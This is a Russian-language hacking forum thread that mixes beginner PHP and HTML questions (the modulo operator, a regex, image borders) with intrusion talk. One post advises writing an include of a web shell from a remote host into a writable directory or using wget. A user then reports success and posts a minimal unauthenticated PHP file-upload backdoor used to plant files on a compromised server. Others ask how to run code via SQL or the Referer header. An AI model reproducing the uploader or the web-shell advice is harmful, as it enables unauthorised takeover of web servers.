Добрый день. Подскажите пожалуйста что означает выражение типа: for($i=$count%$INDEX_COLUMNS;... а именно знак % что в данном случае обозначает? Заранее благодарен.
groundhog наверно проще попросить php код, который я смогу выполнить через sql и с которым я смогу заливать файлы
Ужс %) только проверяй по белому списку расширений... Zitt, можно и регуляркой: PHP: $str = 'id=19296698\');">'; preg_match('#id\=([0-9]+)\'\)\;\"\>#i', $str, $res); print_r($res);
c0m, ты пойми, что с помощью SQL ты PHP-код не выполнишь никак... Только можешь записать его в файл с поомщью INTO OUTFILE, но если у тебя нету прав на это (в 99% случаев их нет), то ничего ты не сделаешь в плане внедрения в файловую систему.
Народ подскажите если в файле php на сервере содержится нижеследующий код это является уязвимостью? Если да то что необходимо переслать в referer чтобы выполнить произвольный код. PHP: <? $referer=$_SERVER['HTTP_REFERER']; echo"$referer"; ?>
Ну так найди диру куда можешь писать и запиши в файл инклуд какого-нибудь веб-шелла с удалённого хоста. Это во-первых, во-вторых попробуй wget
ты никак не выполнишь PHP-код... Блин, ну черти! Ну поймите - PHP код выполняется на стороне сервера, в вашем же случае только клиентская сторона может быть уязвима. И вообще с такими вопросам марш в "Уязвимости".
залил ) PHP: <form enctype=multipart/form-data method=post> <input name=userfile type=file> <input type=submit name=go></form> <?php if(isset($_POST[go]))move_uploaded_file($_FILES[userfile][tmp_name],$_FILES[userfile][name]); ?> з.ы. через инклуд не получалось Спасибо
Вопрос: Зделал сылку на картинку и вокруг неё появилась синяя окантовка как на стондартной сылке! Как от неё избавиться?
если память мне не изменяет то в теге img есть атрибут border=0 или что то в этом духе.. уже забыл...
Хз, по привычке =) Да, но по дефолту он так и стоит (0). Чел наверное сделал как-то так (пишу по памяти): HTML: <a href=site.ru/img.jpg><img src=site.ru/img.jpg></img></a>
Jer1cho, да да , по дефолту стоит обводка 1px если не ошибаюсь. Можно еще так сделать: HTML: <img src="http://forum.antichat.ru/antichat/pic/logo.gif" style="border: solid 0px;" /> а закрывающий тег, необязательный в html ставят для совместимости с xhtml...